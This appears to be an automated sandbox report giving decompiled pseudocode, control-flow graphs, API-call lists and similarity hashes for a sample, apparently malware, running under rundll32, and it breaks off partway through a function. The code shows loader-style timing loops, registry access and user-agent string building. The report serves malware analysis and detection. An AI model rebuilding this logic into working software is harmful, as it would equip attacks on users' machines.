                                          control_flow_graph 199 67790a1-67790b7 HeapCreate 200 67790be-67790d4 GetTickCount call 6776a7f 199->200 201 67790b9-67790bc 199->201 202 677911c 200->202 205 67790d6-67790d7 200->205 201->202 206 67790d8-6779100 SwitchToThread call 6771c04 Sleep 205->206 209 6779102-677910b call 6779511 206->209 212 6779117 call 6774908 209->212 213 677910d 209->213 212->202 213->212
                                          C-Code - Quality: 100%
                                          			E067790A1(void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
                                          				void* _t5;
                                          				void* _t7;
                                          				void* _t10;
                                          				void* _t13;
                                          				void* _t14;
                                          				void* _t15;
                                          				void* _t16;
                                          				signed int _t22;
                                          
                                          				_t16 = __edx;
                                          				_t5 = HeapCreate(0, 0x400000, 0); // executed
                                          				 *0x677d238 = _t5;
                                          				if(_t5 == 0) {
                                          					_t14 = 8;
                                          					return _t14;
                                          				}
                                          				 *0x677d1a8 = GetTickCount();
                                          				_t7 = E06776A7F(_a4);
                                          				if(_t7 == 0) {
                                          					do {
                                          						_t22 = SwitchToThread() + 8;
                                          						_t10 = E06771C04(_a4, _t22);
                                          						Sleep(0x20 + _t22 * 4); // executed
                                          					} while (_t10 == 1);
                                          					if(E06779511(_t15) != 0) {
                                          						 *0x677d260 = 1; // executed
                                          					}
                                          					_t13 = E06774908(_t16); // executed
                                          					return _t13;
                                          				}
                                          				return _t7;
                                          			}












                                          APIs
                                          • HeapCreate.KERNEL32(00000000,00400000,00000000,06776F11,?), ref: 067790AA
                                          • GetTickCount.KERNEL32 ref: 067790BE
                                          • SwitchToThread.KERNEL32(?,00000001,?), ref: 067790D8
                                          • Sleep.KERNEL32(00000000,-00000008,?,00000001,?), ref: 067790F7
                                          Similarity
                                          • API ID: CountCreateHeapSleepSwitchThreadTick
                                          • String ID: <a
                                          • API String ID: 377297877-2910305453
                                          • Opcode ID: 123212b1e917326419ba90513de28870ffdf2ca8a6195947dbd23af462493c99
                                          • Instruction ID: 657458a534b4681a578b6c163b7432a6186c1264ce5b777d5d616aa9140e75a2
                                          • Opcode Fuzzy Hash: 123212b1e917326419ba90513de28870ffdf2ca8a6195947dbd23af462493c99
                                          • Instruction Fuzzy Hash: 25F0F071A61311AFDFA1ABB4AC0CB6A3AAAAF48355F008421EB04D7244EB30C401CAA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 215 6774908-6774922 call 67711af 218 6774924-6774932 215->218 219 6774938-6774946 215->219 218->219 221 6774958-6774973 call 6771111 219->221 222 6774948-677494b 219->222 228 6774975-677497b 221->228 229 677497d 221->229 222->221 223 677494d-6774952 222->223 223->221 225 6774adb 223->225 227 6774add-6774ae2 225->227 230 6774983-6774998 call 6771ec4 call 6771a4e 228->230 229->230 235 67749a3-67749a9 230->235 236 677499a-677499d CloseHandle 230->236 237 67749cf-67749e7 call 67758be 235->237 238 67749ab-67749b0 235->238 236->235 246 6774a13-6774a15 237->246 247 67749e9-6774a11 memset RtlInitializeCriticalSection 237->247 239 6774ac6-6774acb 238->239 240 67749b6 238->240 242 6774ad3-6774ad9 239->242 243 6774acd-6774ad1 239->243 244 67749b9-67749c8 call 6777827 240->244 242->227 243->227 243->242 253 67749ca 244->253 249 6774a16-6774a1a 246->249 247->249 249->239 252 6774a20-6774a36 RtlAllocateHeap 249->252 254 6774a66-6774a68 252->254 255 6774a38-6774a64 wsprintfA 252->255 253->239 256 6774a69-6774a6d 254->256 255->256 256->239 257 6774a6f-6774a8f call 67793d5 call 67798f7 256->257 257->239 262 6774a91-6774a98 call 677205b 257->262 265 6774a9f-6774aa6 262->265 266 6774a9a-6774a9d 262->266 267 6774abb-6774abf call 6779b6f 265->267 268 6774aa8-6774aaa 265->268 266->239 272 6774ac4 267->272 268->239 269 6774aac-6774ab0 call 6776cd3 268->269 273 6774ab5-6774ab9 269->273 272->239 273->239 273->267
                                          C-Code - Quality: 57%
                                          			E06774908(signed int __edx) {
                                          				signed int _v8;
                                          				long _v12;
                                          				CHAR* _v16;
                                          				long _v20;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* _t21;
                                          				CHAR* _t22;
                                          				CHAR* _t25;
                                          				intOrPtr _t26;
                                          				void* _t27;
                                          				void* _t31;
                                          				void* _t32;
                                          				CHAR* _t36;
                                          				CHAR* _t42;
                                          				CHAR* _t43;
                                          				CHAR* _t44;
                                          				CHAR* _t46;
                                          				void* _t49;
                                          				void* _t51;
                                          				signed char _t56;
                                          				intOrPtr _t58;
                                          				signed int _t59;
                                          				void* _t63;
                                          				CHAR* _t67;
                                          				CHAR* _t68;
                                          				char* _t69;
                                          				void* _t70;
                                          
                                          				_t61 = __edx;
                                          				_v20 = 0;
                                          				_v8 = 0;
                                          				_v12 = 0;
                                          				_t21 = E067711AF();
                                          				if(_t21 != 0) {
                                          					_t59 =  *0x677d25c; // 0x4000000a
                                          					_t55 = (_t59 & 0xf0000000) + _t21;
                                          					 *0x677d25c = (_t59 & 0xf0000000) + _t21;
                                          				}
                                          				_t22 =  *0x677d164(0, 2);
                                          				_v16 = _t22;
                                          				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                                          					_t25 = E06771111( &_v8,  &_v20); // executed
                                          					_t54 = _t25;
                                          					_t26 =  *0x677d2a4; // 0x4ca5a8
                                          					if( *0x677d25c > 5) {
                                          						_t8 = _t26 + 0x677e5cd; // 0x4d283a53
                                          						_t27 = _t8;
                                          					} else {
                                          						_t7 = _t26 + 0x677ea05; // 0x44283a44
                                          						_t27 = _t7;
                                          					}
                                          					E06771EC4(_t27, _t27);
                                          					_t31 = E06771A4E(_t61,  &_v20,  &_v12); // executed
                                          					if(_t31 == 0) {
                                          						CloseHandle(_v20);
                                          					}
                                          					_t63 = 5;
                                          					if(_t54 != _t63) {
                                          						 *0x677d270 =  *0x677d270 ^ 0x81bbe65d;
                                          						_t32 = E067758BE(0x60);
                                          						 *0x677d324 = _t32;
                                          						__eflags = _t32;
                                          						if(_t32 == 0) {
                                          							_push(8);
                                          							_pop(0);
                                          						} else {
                                          							memset(_t32, 0, 0x60);
                                          							_t49 =  *0x677d324; // 0x6c495b0
                                          							_t70 = _t70 + 0xc;
                                          							__imp__(_t49 + 0x40);
                                          							_t51 =  *0x677d324; // 0x6c495b0
                                          							 *_t51 = 0x677e845;
                                          						}
                                          						_t54 = 0;
                                          						__eflags = 0;
                                          						if(0 == 0) {
                                          							_t36 = RtlAllocateHeap( *0x677d238, 0, 0x43);
                                          							 *0x677d2c4 = _t36;
                                          							__eflags = _t36;
                                          							if(_t36 == 0) {
                                          								_push(8);
                                          								_pop(0);
                                          							} else {
                                          								_t56 =  *0x677d25c; // 0x4000000a
                                          								_t61 = _t56 & 0x000000ff;
                                          								_t58 =  *0x677d2a4; // 0x4ca5a8
                                          								_t13 = _t58 + 0x677e55a; // 0x697a6f4d
                                          								_t55 = _t13;
                                          								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x677c28f);
                                          							}
                                          							_t54 = 0;
                                          							__eflags = 0;
                                          							if(0 == 0) {
                                          								asm("sbb eax, eax");
                                          								E067793D5( ~_v8 &  *0x677d270, 0x677d00c); // executed
                                          								_t42 = E067798F7(0, _t55, _t63, 0x677d00c); // executed
                                          								_t54 = _t42;
                                          								__eflags = _t54;
                                          								if(_t54 != 0) {
                                          									goto L30;
                                          								}
                                          								_t43 = E0677205B(_t55); // executed
                                          								__eflags = _t43;
                                          								if(_t43 != 0) {
                                          									__eflags = _v8;
                                          									_t67 = _v12;
                                          									if(_v8 != 0) {
                                          										L29:
                                          										_t44 = E06779B6F(_t61, _t67, _v8); // executed
                                          										_t54 = _t44;
                                          										goto L30;
                                          									}
                                          									__eflags = _t67;
                                          									if(__eflags == 0) {
                                          										goto L30;
                                          									}
                                          									_t46 = E06776CD3(__eflags,  &(_t67[4])); // executed
                                          									_t54 = _t46;
                                          									__eflags = _t54;
                                          									if(_t54 == 0) {
                                          										goto L30;
                                          									}
                                          									goto L29;
                                          								}
                                          								_t54 = 8;
                                          							}
                                          						}
                                          					} else {
                                          						_t68 = _v12;
                                          						if(_t68 == 0) {
                                          							L30:
                                          							if(_v16 == 0 || _v16 == 1) {
                                          								 *0x677d160();
                                          							}
                                          							goto L34;
                                          						}
                                          						_t69 =  &(_t68[4]);
                                          						do {
                                          						} while (E06777827(_t63, _t69, 0, 1) == 0x4c7);
                                          					}
                                          					goto L30;
                                          				} else {
                                          					_t54 = _t22;
                                          					L34:
                                          					return _t54;
                                          				}
                                          			}

































                                          APIs
                                            • Part of subcall function 067711AF: GetModuleHandleA.KERNEL32(4C44544E,00000000,06774920,00000001), ref: 067711BE
                                          • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 0677499D
                                            • Part of subcall function 067758BE: RtlAllocateHeap.NTDLL(00000000,-00000008,06771C51), ref: 067758CA
                                          • memset.NTDLL ref: 067749ED
                                          • RtlInitializeCriticalSection.NTDLL(06C49570), ref: 067749FE
                                            • Part of subcall function 06776CD3: memset.NTDLL ref: 06776CED
                                            • Part of subcall function 06776CD3: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 06776D24
                                            • Part of subcall function 06776CD3: StrCmpNIW.SHLWAPI(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,06774AB5), ref: 06776D2F
                                          • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 06774A29
                                          • wsprintfA.USER32 ref: 06774A59
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                          • String ID:
                                          • API String ID: 4246211962-0
                                          • Opcode ID: 2566f38af001d529a0f6279ba25500fcb7640582502d4f034ecc8a2b849ea248
                                          • Instruction ID: 1d83c846aa4067c3c1bd7d02b28bbaf2dc41de883d2fea22f43dda4e8e17743e
                                          • Opcode Fuzzy Hash: 2566f38af001d529a0f6279ba25500fcb7640582502d4f034ecc8a2b849ea248
                                          • Instruction Fuzzy Hash: E551BE71F10215AFEFF1EBA4DD88A6E77E9AF08700F068565E711E7288E6709901CB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 90%
                                          			E06776CD3(void* __eflags, WCHAR* _a4) {
                                          				char _v40;
                                          				char _v44;
                                          				void _v48;
                                          				int _v52;
                                          				char _v56;
                                          				char _v60;
                                          				void* _v64;
                                          				char _v68;
                                          				intOrPtr _v72;
                                          				int _v76;
                                          				WCHAR* _v84;
                                          				intOrPtr _v88;
                                          				intOrPtr _v92;
                                          				char _v96;
                                          				void* __ebx;
                                          				void* __esi;
                                          				intOrPtr _t40;
                                          				int _t45;
                                          				char _t50;
                                          				intOrPtr _t52;
                                          				void* _t55;
                                          				intOrPtr _t67;
                                          				void* _t70;
                                          				void* _t81;
                                          				WCHAR* _t90;
                                          
                                          				_v52 = 0;
                                          				memset( &_v48, 0, 0x2c);
                                          				_v76 = 0;
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				_t40 =  *0x677d2a4; // 0x4ca5a8
                                          				_t5 = _t40 + 0x677ee24; // 0x410025
                                          				_t90 = E06774814(_t5);
                                          				_v84 = _t90;
                                          				if(_t90 == 0) {
                                          					_t81 = 8;
                                          					L24:
                                          					return _t81;
                                          				}
                                          				_t45 = StrCmpNIW(_t90, _a4, lstrlenW(_t90)); // executed
                                          				if(_t45 != 0) {
                                          					_t81 = 1;
                                          					L22:
                                          					E0677147E(_v88);
                                          					goto L24;
                                          				}
                                          				if(E06779138(0,  &_v96) != 0) {
                                          					_v96 = 0;
                                          				}
                                          				_t50 = E0677A5E9(0,  *0x677d33c);
                                          				_v96 = _t50;
                                          				if(_t50 == 0) {
                                          					_t81 = 8;
                                          					goto L19;
                                          				} else {
                                          					_t52 =  *0x677d2a4; // 0x4ca5a8
                                          					_t11 = _t52 + 0x677e81a; // 0x65696c43
                                          					_t55 = E0677A5E9(0, _t11);
                                          					_t93 = _t55;
                                          					if(_t55 == 0) {
                                          						_t81 = 8;
                                          					} else {
                                          						_t81 = E067774B9(_v96, 0x80000001, _v92, _t93,  &_v60,  &_v56);
                                          						E0677147E(_t93);
                                          					}
                                          					if(_t81 != 0) {
                                          						L17:
                                          						E0677147E(_v92);
                                          						L19:
                                          						_t92 = _v96;
                                          						if(_v96 != 0) {
                                          							E0677568A(_t92);
                                          						}
                                          						goto L22;
                                          					} else {
                                          						if(( *0x677d260 & 0x00000001) == 0) {
                                          							L14:
                                          							E06776E92(_t81, _v60, _v56,  *0x677d270, 0);
                                          							_t81 = E06776737(_v72,  &_v64,  &_v60, 0);
                                          							if(_t81 == 0) {
                                          								_v68 = _v96;
                                          								_v64 =  &_v60;
                                          								_t81 = E067772F2( &_v84, 0);
                                          							}
                                          							E0677147E(_v60);
                                          							goto L17;
                                          						}
                                          						_t67 =  *0x677d2a4; // 0x4ca5a8
                                          						_t18 = _t67 + 0x677e823; // 0x65696c43
                                          						_t70 = E0677A5E9(0, _t18);
                                          						_t95 = _t70;
                                          						if(_t70 == 0) {
                                          							_t81 = 8;
                                          						} else {
                                          							_t22 =  &_v96; // 0x65696c43
                                          							_t81 = E067774B9( *_t22, 0x80000001, _v92, _t95,  &_v44,  &_v40);
                                          							E0677147E(_t95);
                                          						}
                                          						if(_t81 != 0) {
                                          							goto L17;
                                          						} else {
                                          							goto L14;
                                          						}
                                          					}
                                          				}
                                          			}





























                                          APIs
                                          • memset.NTDLL ref: 06776CED
                                            • Part of subcall function 06774814: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,?,00000000,06776D15,00410025,00000005,?,00000000), ref: 06774825
                                            • Part of subcall function 06774814: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 06774842
                                          • lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 06776D24
                                          • StrCmpNIW.SHLWAPI(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,06774AB5), ref: 06776D2F
                                          Similarity
                                          • API ID: EnvironmentExpandStrings$lstrlenmemset
                                          • String ID: Clie
                                          • API String ID: 3817122888-1624203186
                                          • Opcode ID: bd7b72e6c0ee4408ba762f770e1e009323671e66c17a1125e374f119c16a2f23
                                          • Instruction ID: a998bb9cf30d4fe77d2f06ea1b2bad3c5e9f38cfc1224e5bd2c6910d86cc5cd6
                                          • Opcode Fuzzy Hash: bd7b72e6c0ee4408ba762f770e1e009323671e66c17a1125e374f119c16a2f23
                                          • Instruction Fuzzy Hash: 3D41C072614745AFDF90EFA0DC84DABB7ECBF48614F00892ABA94D7114D671DC04CBA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          • SysAllocString.OLEAUT32(?), ref: 0677A09B
                                          • SysFreeString.OLEAUT32(00000000), ref: 0677A180
                                            • Part of subcall function 067791B5: SysAllocString.OLEAUT32(0677C298), ref: 06779205
                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 0677A1D3
                                          • SysFreeString.OLEAUT32(00000000), ref: 0677A1E2
                                            • Part of subcall function 0677A872: Sleep.KERNEL32(000001F4), ref: 0677A8BA
                                          Similarity
                                          • API ID: String$AllocFree$ArrayDestroySafeSleep
                                          • String ID:
                                          • API String ID: 3193056040-0
                                          • Opcode ID: 63b4a0a655dfb2dcfbf4f39150266836202b55c899b57c10b1212ccd7327e8d5
                                          • Instruction ID: 8e30b683977f8d91295d3b47c7906773ade485549d94ef816774696d0c10613d
                                          • Opcode Fuzzy Hash: 63b4a0a655dfb2dcfbf4f39150266836202b55c899b57c10b1212ccd7327e8d5
                                          • Instruction Fuzzy Hash: F6513375900609AFEF41DFA8CC44AAEB7B6FF88750B148469E615DB210EB31ED45CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          • SysAllocString.OLEAUT32(80000002), ref: 06775057
                                          • SysAllocString.OLEAUT32(0677A6F4), ref: 0677509B
                                          • SysFreeString.OLEAUT32(00000000), ref: 067750AF
                                          • SysFreeString.OLEAUT32(00000000), ref: 067750BD
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$AllocFree
                                          • String ID:
                                          • API String ID: 344208780-0
                                          • Opcode ID: f602809d2bc77ee9465b6d96afa7808eef68f2192a7c9067042bf0be0014ff28
                                          • Instruction ID: e0429ca0650fc655bb77c9bc047c98a88d49ee6aec6a80a8096770e4f5471a24
                                          • Opcode Fuzzy Hash: f602809d2bc77ee9465b6d96afa7808eef68f2192a7c9067042bf0be0014ff28
                                          • Instruction Fuzzy Hash: C7310D71910209EFDF15DFA8D8C49AE7BB9FF48304B10846AEA05DB250EB759941CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 388 67768cf-67768e9 call 6779138 391 67768ee-6776907 call 6771b13 388->391 392 67768eb 388->392 394 677690c-6776910 391->394 392->391 395 6776916-6776930 StrToIntExW 394->395 396 67769cf-67769d4 394->396 399 6776936-6776952 call 6775fcb 395->399 400 67769bf-67769c1 395->400 397 67769d6 call 677568a 396->397 398 67769db-67769e1 396->398 397->398 401 67769c2-67769cd HeapFree 399->401 405 6776954-677696d call 67775e7 399->405 400->401 401->396 408 677698f-67769bd call 6771bc1 HeapFree 405->408 409 677696f-6776976 405->409 408->401 409->408 410 6776978-677698a call 67775e7 409->410 410->408
                                          C-Code - Quality: 100%
                                          			E067768CF() {
                                          				void* _v8;
                                          				int _v12;
                                          				WCHAR* _v16;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* _t23;
                                          				intOrPtr _t24;
                                          				void* _t26;
                                          				intOrPtr _t32;
                                          				intOrPtr _t35;
                                          				intOrPtr _t38;
                                          				intOrPtr _t42;
                                          				void* _t45;
                                          				void* _t51;
                                          
                                          				_v12 = 0;
                                          				_t23 = E06779138(0,  &_v8); // executed
                                          				if(_t23 != 0) {
                                          					_v8 = 0;
                                          				}
                                          				_t24 =  *0x677d2a4; // 0x4ca5a8
                                          				_t4 = _t24 + 0x677ede0; // 0x6c49388
                                          				_t5 = _t24 + 0x677ed88; // 0x4f0053
                                          				_t26 = E06771B13( &_v16, _v8, _t5, _t4); // executed
                                          				_t45 = _t26;
                                          				if(_t45 == 0) {
                                          					StrToIntExW(_v16, 0,  &_v12);
                                          					_t45 = 8;
                                          					if(_v12 < _t45) {
                                          						_t45 = 1;
                                          						__eflags = 1;
                                          					} else {
                                          						_t32 =  *0x677d2a4; // 0x4ca5a8
                                          						_t11 = _t32 + 0x677edd4; // 0x6c4937c
                                          						_t48 = _t11;
                                          						_t12 = _t32 + 0x677ed88; // 0x4f0053
                                          						_t51 = E06775FCB(_t11, _t12, _t11);
                                          						_t58 = _t51;
                                          						if(_t51 != 0) {
                                          							_t35 =  *0x677d2a4; // 0x4ca5a8
                                          							_t13 = _t35 + 0x677ea59; // 0x30314549
                                          							if(E067775E7(_t48, _t58, _v8, _t51, _t13, 0x14) == 0) {
                                          								_t60 =  *0x677d25c - 6;
                                          								if( *0x677d25c <= 6) {
                                          									_t42 =  *0x677d2a4; // 0x4ca5a8
                                          									_t15 = _t42 + 0x677ec3a; // 0x52384549
                                          									E067775E7(_t48, _t60, _v8, _t51, _t15, 0x13);
                                          								}
                                          							}
                                          							_t38 =  *0x677d2a4; // 0x4ca5a8
                                          							_t17 = _t38 + 0x677ee18; // 0x6c493c0
                                          							_t18 = _t38 + 0x677edf0; // 0x680043
                                          							_t45 = E06771BC1(_v8, 0x80000001, _t51, _t18, _t17);
                                          							HeapFree( *0x677d238, 0, _t51);
                                          						}
                                          					}
                                          					HeapFree( *0x677d238, 0, _v16);
                                          				}
                                          				_t53 = _v8;
                                          				if(_v8 != 0) {
                                          					E0677568A(_t53);
                                          				}
                                          				return _t45;
                                          			}


















                                          APIs
                                          • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,06C49388,00000000,?,7519F710,00000000,7519F730), ref: 0677691E
                                          • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,06C493C0,?,00000000,30314549,00000014,004F0053,06C4937C), ref: 067769BB
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,06779C10), ref: 067769CD
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: acc5def7ea58aaa23405e680c8b91b43b9808f51acc2bf9c3c2966c18df416a5
                                          • Instruction ID: 83fe5f4b9eb540d0e32a52181a3fc371a315057e2d22a5cbe3d8f201383068a7
                                          • Opcode Fuzzy Hash: acc5def7ea58aaa23405e680c8b91b43b9808f51acc2bf9c3c2966c18df416a5
                                          • Instruction Fuzzy Hash: 78317E72A00109BFDF61EBA4DC88EAABBBEEF44710F1540A9B604AB114E7719A15DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 414 6779f11-6779f39 415 6779f3b-6779f43 RtlAllocateHeap 414->415 416 6779f59-6779f61 RtlAllocateHeap 414->416 417 6779f45-6779f52 call 6771754 415->417 418 6779f79-6779f7b 415->418 416->418 419 6779f63-6779f70 call 677514f 416->419 423 6779f57 417->423 422 6779f7c-6779f7e 418->422 424 6779f75-6779f77 419->424 425 6779f80-6779fa1 call 6777cf7 call 67760cf 422->425 426 6779fbc 422->426 423->424 424->422 432 6779fa3-6779fb6 call 6776106 HeapFree 425->432 433 6779fcb-6779fdc 425->433 427 6779fc2-6779fc8 426->427 432->426 433->427 435 6779fde-6779fe5 433->435 435->427
                                          C-Code - Quality: 58%
                                          			E06779F11(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                          				void* _v8;
                                          				void* __edi;
                                          				intOrPtr _t19;
                                          				void* _t25;
                                          				void* _t31;
                                          				void* _t37;
                                          				void* _t41;
                                          				intOrPtr _t43;
                                          				void* _t44;
                                          
                                          				_t37 = __edx;
                                          				_t33 = __ecx;
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_t43 =  *0x677d2a4; // 0x4ca5a8
                                          				_push(0x800);
                                          				_push(0);
                                          				_push( *0x677d238);
                                          				_t1 = _t43 + 0x677e791; // 0x6976612e
                                          				_t44 = _t1;
                                          				if( *0x677d24c >= 5) {
                                          					if(RtlAllocateHeap() == 0) {
                                          						L6:
                                          						_t31 = 8;
                                          						L7:
                                          						if(_t31 != 0) {
                                          							L10:
                                          							 *0x677d24c =  *0x677d24c + 1;
                                          							L11:
                                          							return _t31;
                                          						}
                                          						_t46 = _a4;
                                          						_t41 = _v8;
                                          						 *_a16 = _a4;
                                          						 *_a20 = E06777CF7(_a4, _t41);
                                          						_t19 = E067760CF(_t41, _t41, _t46);
                                          						if(_t19 != 0) {
                                          							 *_a8 = _t41;
                                          							 *_a12 = _t19;
                                          							if( *0x677d24c < 5) {
                                          								 *0x677d24c =  *0x677d24c & 0x00000000;
                                          							}
                                          							goto L11;
                                          						}
                                          						_t31 = 0xbf;
                                          						E06776106();
                                          						HeapFree( *0x677d238, 0, _t41);
                                          						goto L10;
                                          					}
                                          					_t25 = E0677514F(_a4, _t33, _t37, _t44,  &_v8,  &_a4, _t14);
                                          					L5:
                                          					_t31 = _t25;
                                          					goto L7;
                                          				}
                                          				if(RtlAllocateHeap() == 0) {
                                          					goto L6;
                                          				}
                                          				_t25 = E06771754(_a4, _t33, _t37, _t44,  &_v8,  &_a4, _t26); // executed
                                          				goto L5;
                                          			}













                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 06779F3B
                                            • Part of subcall function 06771754: GetTickCount.KERNEL32 ref: 06771768
                                            • Part of subcall function 06771754: wsprintfA.USER32 ref: 067717B8
                                            • Part of subcall function 06771754: wsprintfA.USER32 ref: 067717D5
                                            • Part of subcall function 06771754: wsprintfA.USER32 ref: 06771801
                                            • Part of subcall function 06771754: HeapFree.KERNEL32(00000000,?), ref: 06771813
                                            • Part of subcall function 06771754: wsprintfA.USER32 ref: 06771834
                                            • Part of subcall function 06771754: HeapFree.KERNEL32(00000000,?), ref: 06771844
                                            • Part of subcall function 06771754: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 06771872
                                            • Part of subcall function 06771754: GetTickCount.KERNEL32 ref: 06771883
                                          • RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 06779F59
                                          • HeapFree.KERNEL32(00000000,?,?,?,06779C62,00000002,?,?,?,?), ref: 06779FB6
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: Heap$wsprintf$AllocateFree$CountTick
                                          • String ID:
                                          • API String ID: 1676223858-0
                                          • Opcode ID: d01eb736620b00387a3283a0b50180b7552a702f4dc513a32614e8fd390e7691
                                          • Instruction ID: 89173f4ed671f46c279790637ac7a2e0ca0e976944268dc3355fc285ee3f39d3
                                          • Opcode Fuzzy Hash: d01eb736620b00387a3283a0b50180b7552a702f4dc513a32614e8fd390e7691
                                          • Instruction Fuzzy Hash: 63215972211204AFDF91DF68DC48AAA37ADEF49340F108026FB02D7250DB70E946CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 75%
                                          			E0677642C(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                                          				void* _v8;
                                          				void* __esi;
                                          				intOrPtr* _t35;
                                          				void* _t40;
                                          				intOrPtr* _t41;
                                          				intOrPtr* _t43;
                                          				intOrPtr* _t45;
                                          				intOrPtr* _t50;
                                          				intOrPtr* _t52;
                                          				void* _t54;
                                          				intOrPtr* _t55;
                                          				intOrPtr* _t57;
                                          				intOrPtr* _t61;
                                          				intOrPtr* _t65;
                                          				intOrPtr _t68;
                                          				void* _t72;
                                          				void* _t75;
                                          				void* _t76;
                                          
                                          				_t55 = _a4;
                                          				_t35 =  *((intOrPtr*)(_t55 + 4));
                                          				_a4 = 0;
                                          				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                                          				if(_t76 < 0) {
                                          					L18:
                                          					return _t76;
                                          				}
                                          				_t40 = E06774FFA(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                                          				_t76 = _t40;
                                          				if(_t76 >= 0) {
                                          					_t61 = _a28;
                                          					if(_t61 != 0 &&  *_t61 != 0) {
                                          						_t52 = _v8;
                                          						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                                          					}
                                          					if(_t76 >= 0) {
                                          						_t43 =  *_t55;
                                          						_t68 =  *0x677d2a4; // 0x4ca5a8
                                          						_t20 = _t68 + 0x677e1fc; // 0x740053
                                          						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                                          						if(_t76 >= 0) {
                                          							_t76 = E06775103(_a4);
                                          							if(_t76 >= 0) {
                                          								_t65 = _a28;
                                          								if(_t65 != 0 &&  *_t65 == 0) {
                                          									_t50 = _a4;
                                          									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                                          								}
                                          							}
                                          						}
                                          						_t45 = _a4;
                                          						if(_t45 != 0) {
